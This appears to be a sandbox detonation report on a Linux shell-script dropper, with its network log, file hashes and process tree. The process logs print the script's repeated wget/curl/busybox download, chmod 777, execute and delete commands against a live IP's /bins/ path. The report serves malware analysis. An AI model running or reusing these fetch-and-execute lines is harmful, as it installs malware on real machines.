/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

21s

Max time network

131s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

